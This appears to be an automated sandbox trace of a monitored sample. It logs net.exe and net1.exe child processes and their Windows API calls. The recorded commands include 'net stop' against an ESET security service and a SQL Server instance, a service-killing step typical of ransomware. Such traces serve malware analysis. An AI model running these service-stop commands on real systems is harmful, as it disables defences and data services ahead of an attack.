"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 448 os_tid = 0xad4 [0209.714] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bff24 | out: lpSystemTimeAsFileTime=0x1bff24*(dwLowDateTime=0x46317e40, dwHighDateTime=0x1d57a87)) [0209.714] GetCurrentProcessId () returned 0x5e8 [0209.714] GetCurrentThreadId () returned 0xad4 [0209.714] GetTickCount () returned 0x116e051 [0209.714] QueryPerformanceCounter (in: lpPerformanceCount=0x1bff1c | out: lpPerformanceCount=0x1bff1c*=32999843903) returned 1 [0209.714] GetModuleHandleA (lpModuleName=0x0) returned 0x430000 [0209.714] __set_app_type (_Type=0x1) [0209.714] __p__fmode () returned 0x74eb31f4 [0209.714] __p__commode () returned 0x74eb31fc [0209.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x43ffe6) returned 0x0 [0209.714] __getmainargs (in: _Argc=0x449064, _Argv=0x44906c, _Env=0x449068, _DoWildCard=0, _StartInfo=0x449024 | out: _Argc=0x449064, _Argv=0x44906c, _Env=0x449068) returned 0 [0209.715] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.715] GetConsoleOutputCP () returned 0x1b5 [0209.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x449080 | out: lpCPInfo=0x449080) returned 1 [0209.715] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.718] sprintf_s (in: _DstBuf=0x1bfedc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.718] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.720] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.720] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0209.720] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfca8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x62) returned 0x2d3c00 [0209.720] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.721] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfeac | out: Buffer=0x1bfeac*=0x2d1c60) returned 0x0 [0209.721] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfeac | out: Buffer=0x1bfeac*=0x2d1c78) returned 0x0 [0209.721] _fileno (_File=0x74eb2900) returned -2 [0209.721] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.721] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.721] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.721] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.721] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.721] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.721] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.721] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.721] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.721] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.721] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.721] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.721] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0209.721] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.721] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.721] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.721] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.721] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.721] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.721] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.721] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.721] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.721] _wcsicmp (_String1="accounts", _String2="ESHASRV") returned -4 [0209.721] _wcsicmp (_String1="computer", _String2="ESHASRV") returned -2 [0209.721] _wcsicmp (_String1="config", _String2="ESHASRV") returned -2 [0209.721] _wcsicmp (_String1="continue", _String2="ESHASRV") returned -2 [0209.721] _wcsicmp (_String1="cont", _String2="ESHASRV") returned -2 [0209.721] _wcsicmp (_String1="file", _String2="ESHASRV") returned 1 [0209.721] _wcsicmp (_String1="files", _String2="ESHASRV") returned 1 [0209.721] _wcsicmp (_String1="group", _String2="ESHASRV") returned 2 [0209.722] _wcsicmp (_String1="groups", _String2="ESHASRV") returned 2 [0209.722] _wcsicmp (_String1="help", _String2="ESHASRV") returned 3 [0209.722] _wcsicmp (_String1="helpmsg", _String2="ESHASRV") returned 3 [0209.722] _wcsicmp (_String1="localgroup", _String2="ESHASRV") returned 7 [0209.722] _wcsicmp (_String1="pause", _String2="ESHASRV") returned 11 [0209.722] _wcsicmp (_String1="session", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="sessions", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="sess", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="share", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="start", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="stats", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="statistics", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="stop", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="time", _String2="ESHASRV") returned 15 [0209.722] _wcsicmp (_String1="user", _String2="ESHASRV") returned 16 [0209.722] _wcsicmp (_String1="users", _String2="ESHASRV") returned 16 [0209.722] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0209.722] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0209.722] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0209.722] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0209.722] _wcsicmp (_String1="netpopup", _String2="ESHASRV") returned 9 [0209.722] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0209.722] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0209.722] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0209.722] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0209.722] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0209.722] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0209.722] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0209.722] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0209.722] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0209.722] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0209.722] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0209.722] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0209.722] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0209.723] _wcsupr (in: _String="ESHASRV" | out: _String="ESHASRV") returned="ESHASRV" [0209.723] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2d54b8 [0209.725] GetServiceKeyNameW (in: hSCManager=0x2d54b8, lpDisplayName="ESHASRV", lpServiceName=0x44aaf0, lpcchBuffer=0x1bfe48 | out: lpServiceName="", lpcchBuffer=0x1bfe48) returned 0 [0209.726] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0209.726] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0209.726] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0209.726] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0209.726] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0209.726] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0209.726] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0209.726] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0209.726] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0209.726] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0209.726] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0209.726] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0209.726] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0209.726] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0209.726] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0209.726] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0209.726] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0209.726] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0209.726] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0209.726] NetServiceControl (in: servername=0x0, service="ESHASRV", opcode=0x0, arg=0x0, bufptr=0x1bfe44 | out: bufptr=0x1bfe44) returned 0x889 [0209.727] wcscpy_s (in: _Destination=0x44a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.727] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0209.728] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x44b338, nSize=0x800, Arguments=0x449dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0209.729] GetFileType (hFile=0x26c) returned 0x3 [0209.729] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2d3fe8 [0209.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2d3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0209.729] WriteFile (in: hFile=0x26c, lpBuffer=0x2d3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfd84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfd84, lpOverlapped=0x0) returned 0 [0209.729] LocalFree (hMem=0x2d3fe8) returned 0x0 [0209.729] GetFileType (hFile=0x26c) returned 0x3 [0209.729] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0209.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0209.729] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfd84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfd84, lpOverlapped=0x0) returned 0 [0209.729] LocalFree (hMem=0x2d6290) returned 0x0 [0209.729] _ultow (in: _Dest=0x889, _Radix=1834420 | out: _Dest=0x889) returned="2185" [0209.729] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x44b338, nSize=0x800, Arguments=0x449dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0209.729] GetFileType (hFile=0x26c) returned 0x3 [0209.729] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2d6290 [0209.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2d6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0209.729] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfd90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfd90, lpOverlapped=0x0) returned 0 [0209.729] LocalFree (hMem=0x2d6290) returned 0x0 [0209.729] GetFileType (hFile=0x26c) returned 0x3 [0209.730] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0209.730] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0209.730] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfd90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfd90, lpOverlapped=0x0) returned 0 [0209.730] LocalFree (hMem=0x2d6290) returned 0x0 [0209.730] NetApiBufferFree (Buffer=0x2d1c60) returned 0x0 [0209.730] NetApiBufferFree (Buffer=0x2d1c78) returned 0x0 [0209.730] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0209.730] exit (_Code=2) Process: id = "276" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x62676000" os_pid = "0x870" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 449 os_tid = 0x894 Process: id = "277" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4e8cb000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "276" os_parent_pid = "0x870" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 450 os_tid = 0x308 [0209.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fa14 | out: lpSystemTimeAsFileTime=0x13fa14*(dwLowDateTime=0x46494c00, dwHighDateTime=0x1d57a87)) [0209.870] GetCurrentProcessId () returned 0x6c8 [0209.870] GetCurrentThreadId () returned 0x308 [0209.870] GetTickCount () returned 0x116e0ed [0209.870] QueryPerformanceCounter (in: lpPerformanceCount=0x13fa0c | out: lpPerformanceCount=0x13fa0c*=33015663323) returned 1 [0209.872] GetModuleHandleA (lpModuleName=0x0) returned 0xae0000 [0209.872] __set_app_type (_Type=0x1) [0209.872] __p__fmode () returned 0x74eb31f4 [0209.872] __p__commode () returned 0x74eb31fc [0209.873] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaeffe6) returned 0x0 [0209.873] __getmainargs (in: _Argc=0xaf9064, _Argv=0xaf906c, _Env=0xaf9068, _DoWildCard=0, _StartInfo=0xaf9024 | out: _Argc=0xaf9064, _Argv=0xaf906c, _Env=0xaf9068) returned 0 [0209.873] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.873] GetConsoleOutputCP () returned 0x1b5 [0209.873] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xaf9080 | out: lpCPInfo=0xaf9080) returned 1 [0209.873] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.876] sprintf_s (in: _DstBuf=0x13f9cc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.876] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.878] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.878] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0209.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f798, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.878] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x6c) returned 0x4c3c10 [0209.878] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.878] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13f99c | out: Buffer=0x13f99c*=0x4c1c70) returned 0x0 [0209.878] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13f99c | out: Buffer=0x13f99c*=0x4c1c88) returned 0x0 [0209.879] _fileno (_File=0x74eb2900) returned -2 [0209.879] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.879] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.879] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.879] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.879] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.879] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.879] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.879] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.879] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.879] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.879] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.879] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.879] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0209.879] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.879] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.879] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.879] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.879] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.879] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.879] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.879] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.879] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.879] _wcsicmp (_String1="accounts", _String2="MSSQL$TPSAMA") returned -12 [0209.879] _wcsicmp (_String1="computer", _String2="MSSQL$TPSAMA") returned -10 [0209.879] _wcsicmp (_String1="config", _String2="MSSQL$TPSAMA") returned -10 [0209.879] _wcsicmp (_String1="continue", _String2="MSSQL$TPSAMA") returned -10 [0209.879] _wcsicmp (_String1="cont", _String2="MSSQL$TPSAMA") returned -10 [0209.879] _wcsicmp (_String1="file", _String2="MSSQL$TPSAMA") returned -7 [0209.879] _wcsicmp (_String1="files", _String2="MSSQL$TPSAMA") returned -7 [0209.879] _wcsicmp (_String1="group", _String2="MSSQL$TPSAMA") returned -6 [0209.879] _wcsicmp (_String1="groups", _String2="MSSQL$TPSAMA") returned -6 [0209.879] _wcsicmp (_String1="help", _String2="MSSQL$TPSAMA") returned -5 [0209.880] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPSAMA") returned -5 [0209.880] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPSAMA") returned -1 [0209.880] _wcsicmp (_String1="pause", _String2="MSSQL$TPSAMA") returned 3 [0209.880] _wcsicmp (_String1="session", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="sessions", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="sess", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="share", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="start", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="stats", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="statistics", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="stop", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="time", _String2="MSSQL$TPSAMA") returned 7 [0209.880] _wcsicmp (_String1="user", _String2="MSSQL$TPSAMA") returned 8 [0209.880] _wcsicmp (_String1="users", _String2="MSSQL$TPSAMA") returned 8 [0209.880] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0209.880] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0209.880] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0209.880] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0209.880] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPSAMA") returned 1 [0209.880] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0209.880] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0209.880] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0209.880] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0209.880] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0209.880] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0209.880] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0209.880] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0209.880] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0209.880] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0209.880] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0209.880] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0209.880] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0209.881] _wcsupr (in: _String="MSSQL$TPSAMA" | out: _String="MSSQL$TPSAMA") returned="MSSQL$TPSAMA" [0209.881] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4c54d0 [0209.883] GetServiceKeyNameW (in: hSCManager=0x4c54d0, lpDisplayName="MSSQL$TPSAMA", lpServiceName=0xafaaf0, lpcchBuffer=0x13f938 | out: lpServiceName="", lpcchBuffer=0x13f938) returned 0 [0209.884] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0209.884] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0209.884] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0209.884] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0209.884] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0209.884] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0209.884] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0209.884] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0209.884] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0209.884] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0209.884] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0209.884] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0209.884] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0209.884] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0209.884] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0209.884] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0209.884] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0209.884] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0209.884] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0209.884] NetServiceControl (in: servername=0x0, service="MSSQL$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x13f934 | out: bufptr=0x13f934) returned 0x889 [0209.904] wcscpy_s (in: _Destination=0xafa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.904] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0209.905] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xafb338, nSize=0x800, Arguments=0xaf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0209.906] GetFileType (hFile=0x26c) returned 0x3 [0209.906] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4c4000 [0209.906] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4c4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0209.906] WriteFile (in: hFile=0x26c, lpBuffer=0x4c4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13f874, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13f874, lpOverlapped=0x0) returned 0 [0209.906] LocalFree (hMem=0x4c4000) returned 0x0 [0209.906] GetFileType (hFile=0x26c) returned 0x3 [0209.906] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c62a8 [0209.906] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0209.906] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f874, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13f874, lpOverlapped=0x0) returned 0 [0209.906] LocalFree (hMem=0x4c62a8) returned 0x0 [0209.906] _ultow (in: _Dest=0x889, _Radix=1308836 | out: _Dest=0x889) returned="2185" [0209.906] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xafb338, nSize=0x800, Arguments=0xaf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0209.906] GetFileType (hFile=0x26c) returned 0x3 [0209.906] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4c62a8 [0209.906] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4c62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0209.906] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13f880, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13f880, lpOverlapped=0x0) returned 0 [0209.906] LocalFree (hMem=0x4c62a8) returned 0x0 